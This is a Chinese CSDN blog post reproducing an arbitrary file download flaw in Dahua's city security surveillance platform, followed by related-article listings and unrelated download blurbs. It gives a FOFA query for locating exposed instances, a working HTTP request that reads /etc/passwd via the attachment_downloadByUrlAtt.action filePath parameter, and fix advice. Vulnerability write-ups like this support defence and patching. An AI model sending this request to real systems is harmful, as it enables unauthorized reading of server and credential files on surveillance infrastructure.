【漏洞复现】大华城市安防监控系统平台-attachment_downloadByUrlAtt.action-任意文件下载漏洞

已于 2024-03-15 15:44:42 修改
阅读量465 收藏 8
点赞数 9
分类专栏: 漏洞复现 文章标签: 网络安全
于 2024-03-15 11:39:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80733390/article/details/136735229
版权

免责声明

文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

影响范围

大华城市安防监控系统平台

资产测绘

FOFA:

app="dahua-DSS"

image

漏洞复现

GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

image

修复建议

1、特殊字符过滤:检查用户输入,过滤或转义含有“…/”、“…\”、“%00”,“…”,“./”,“#”等跳转目录或字符终止符、截断字符的输入。
2、合法性判断:严格过滤用户输入字符的合法性,比如文件类型、文件地址、文件内容等。
3、白名单:白名单限定访问文件的路径、名称及后缀名。
4、提供设备的型号、序列号、项目名称、项目所在地、对应区域接口人、设备当前版本及发布日期、客户邮箱号码寻求厂商支持。

Nday_Seeker
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
大华城市安防监控系统平台 任意文件下载漏洞复现(QVD-2023-20736)
0xSec
02-01 414
大华城市安防监控系统平台 attachment_downloadByUrlAtt.action接口存在任意文件下载漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
漏洞复现大华DSS城市安防监控平台任意文件读取漏洞
晚风不及你
03-05 736
大华DSS数字监控系统平台存在任意文件读取漏洞,攻击者可以通过此漏洞获取服务器上的任意文件,造成敏感信息泄露。
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 522
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
漏洞复现大华城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
凝聚力安全团队
06-21 342
大华城市安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。该平台支持多种接入方式,包括网络视频、模拟视频、数字视频、IP电话、对讲机等。此外,该平台还支持多种报警方式,包括移动侦测、区域入侵、越线报警、人员聚集等。大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件
漏洞复现大华城市安防监控系统平台 任意文件下载漏洞
KKleeeaa的博客
02-01 485
任意文件下载
大华城市安防监控系统平台管理存在任意文件下载漏洞
剁椒鱼头没剁椒的博客
02-14 2875
大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。刷新登录页面进行抓包,然后在数据包中添加POC。大华城市安防监控系统平台管理。
Dahua-Password_0.zip
05-20
大华NVR是监控系统中的核心部分,用于录制、存储和管理来自多个摄像头的视频流。NVR通常支持网络连接,可以通过Web界面进行远程访问和配置,这就需要用户拥有正确的登录凭证——用户名和密码。忘记这些凭证可能导致...
大华平台DSS视频监控系统介绍.doc
05-13
大华平台DSS视频监控系统是一款专为各类企业和组织提供高效、稳定且全面的视频监控解决方案。该系统集成了先进的音视频处理技术、智能分析功能和强大的管理平台,旨在提升安全防护能力,优化运营管理。 1. **概述**...
Dahua大华DH-HCVR0405AG-VFD_硬盘录像机(ATM系列)使用说明书.pdf
07-02
Dahua大华DH-HCVR0405AG-VFD硬盘录像机(ATM系列)使用说明书.pdf 本文档旨在为用户提供Dahua大华DH-HCVR0405AG-VFD硬盘录像机(ATM系列)的使用说明和安全须知,以确保用户正确地使用该设备,避免可能的危险和损失...
Dahua大华ITACD-006B_智慧停车识别系统使用说明书.pdf
07-05
Dahua大华ITACD-006B智慧停车识别系统使用说明书.pdf 本文档提供了Dahua大华ITACD-006B智慧停车识别系统的使用说明书,旨在帮助用户正确使用和维护该系统。下面是从该文档中提取的关键知识点: 1. 安全须知 在...
大华安防监控基础知识入门-图片.pptx
07-09
大华摄像头,视频监控基础知识入门。安防行业与相关背景知识。
漏洞复现大华DSS数字监控系统itcBulletin SQL注入漏洞
晚风不及你
03-06 959
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
支持向量机非线性回归通用matlab程序【含Matlab源码】【Matlab精品】..zip
08-08
### 支持向量机非线性回归通用MATLAB程序解析 #### 一、概述 本文将详细介绍一个基于MATLAB的支持向量机(SVM)非线性回归的通用程序。该程序采用支持向量机方法来实现数据的非线性回归,并通过不同的核函数设置来适应不同类型的数据分布。此外,该程序还提供了数据预处理的方法,使得用户能够更加方便地应用此程序解决实际问题。 #### 二、核心功能与原理 ##### 1. 支持向量机(SVM) 支持向量机是一种监督学习模型,主要用于分类和回归分析。对于非线性回归任务,SVM通过引入核技巧(kernel trick)将原始低维空间中的非线性问题转换为高维空间中的线性问题,从而实现有效的非线性建模。 ##### 2. 核函数 核函数的选择直接影响到模型的性能。本程序内置了三种常用的核函数: - **线性核函数**:`K(x, y) = x'y` - **多项式核函数**:`K(x, y) = (x'y + 1)^d` - **径向基函数(RBF)**:`K(x, y) = exp(-γ|x - y|^2)` 其中RBF核函数被广泛应用于非线性问题中,因为它可以处理非常复杂的非线性关系。本程序默认使用的是RBF核函数,参数`D`用于控制高斯核函数的宽度。 ##### 3. 数据预处理 虽然程序本身没有直接涉及数据预处理的过程,但在实际应用中,对数据进行适当的预处理是非常重要的。常见的预处理步骤包括归一化、缺失值处理等。 ##### 4. 模型参数 - **Epsilon**: ε-insensitive loss function的ε值,控制回归带宽。 - **C**: 松弛变量的惩罚系数,控制模型复杂度与过拟合的风险之间的平衡。 #### 三、程序实现细节 ##### 1. 函数输入与输出 - **输入**: - `X`: 输入特征矩阵,维度为(n, l),其中n是特征数量,l是样本数量。 - `Y`: 目标值向量,长度为l。 - `Epsilon`: 回归带宽。 - `C`: 松弛变量的惩罚系数。 - `D`: RBF核函数的参数。 - **输出**: - `Alpha1`: 正的拉格朗日乘子向量。 - `Alpha2`: 负的拉格朗日乘子向量。 - `Alpha`: 拉格朗日乘子向量。 - `Flag`: 标记向量,表示每个样本的类型。 - `B`: 偏置项。 ##### 2. 核心代码解析 程序首先计算所有样本间的核矩阵`K`,然后构建二次规划问题并求解得到拉格朗日乘子向量。根据拉格朗日乘子的值确定支持向量,并计算偏置项`B`。 - **核矩阵计算**:采用RBF核函数,通过`exp(-(sum((xi-xj).^2)/D))`计算任意两个样本之间的相似度。 - **二次规划**:构建目标函数和约束条件,使用`quadprog`函数求解最小化问题。 - **支持向量识别**:根据拉格朗日乘子的大小判断每个样本是否为支持向量,并据此计算偏置项`B`。 #### 四、程序扩展与优化 - **多核函数支持**:可以通过增加更多的核函数选项,提高程序的灵活性。 - **自动调参**:实现参数自动选择的功能,例如通过交叉验证选择最优的`Epsilon`和`C`值。 - **并行计算**:利用MATLAB的并行计算工具箱加速计算过程,特别是当样本量很大时。 #### 五、应用场景 该程序适用于需要进行非线性回归预测的场景,如经济预测、天气预报等领域。通过调整核函数和参数,可以有效应对各种类型的非线性问题。 ### 总结 本程序提供了一个支持向量机非线性回归的完整实现框架,通过灵活的核函数设置和参数调整,能够有效地处理非线性问题。对于需要进行回归预测的应用场景,这是一个非常实用且强大的工具。
新译林版-高中英语-英语必修三单词-默写表格 .xlsx
最新发布
08-08
新译林版-高中英语-英语必修三单词-默写表格 提供中文默写英文及词性,可直接打印 ▲Unit1 1 伤害,损害  2 土壤;国土,领土,土地  3 生态系统 
WEB 串口工具,web 485串口工具,Web Serial Port Tool
08-08
Web Serial Port Tool是一款创新的浏览器端串口通信工具,它利用现代Web技术(如Web Serial API)允许开发者和用户无需安装任何额外软件即可在网页上直接与硬件设备(如传感器、微控制器等)进行串口通信。该工具旨在简化物联网(IoT)项目开发和调试过程,提升工作效率。 主要功能: 实时串口通信:支持数据的发送与接收,实现设备间的即时数据交换。 配置灵活:允许用户自定义波特率、数据位、停止位和校验位等串口参数,以满足不同设备的需求。 数据可视化:内置简单的数据解析和可视化功能,帮助用户直观理解设备数据。 日志记录:提供串口通信日志记录功能,便于后续分析和调试。 多串口支持(可选):支持同时连接并管理多个串口设备,增强多设备交互能力。
dahua大华dh-asc1201b-d_门禁控制器(单门双向b款)使用说明书.pdf
05-13
门禁控制器是物业管理中不可或缺的一种设备,其作用是控制人员进出特定区域,管理区域内的人员流动。dahua大华dh-asc1201b-d是一款单门双向b款门禁控制器,下面将对其使用说明书进行简要介绍。 首先,该控制器支持多种门禁方式,如刷卡、密码、指纹等。需要根据用户需求选择相应的门禁方式,并合理设置设置管理权限,以确保门禁系统运作的有效性和安全性。 其次,在设置门禁参数时,需要先清楚地了解本控制器的参数设置方法。门禁参数的设置操作一般通过PC端软件或设备本身UI界面实现,用户按照使用说明书的指引进行相应的操作即可。 在门禁控制器配置时,还需要挂载相应的感应器,具体的挂载方法需要查阅使用说明书,以免在操作过程中出现错漏。 最后,使用门禁控制器也需要注意安全问题。如合理设置管理权限、定期更换密码、防火防盗等安全问题。一旦发现异常情况(如有人强行冲闯门禁系统),要及时报警或联系相关管理人员进行处理。 综上所述,dahua大华dh-asc1201b-d门禁控制器使用说明书中需要用户了解和掌握的内容还是比较全面且复杂的,操作前应仔细阅读使用说明书,并保持警觉,确保门禁系统的安全高效运作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值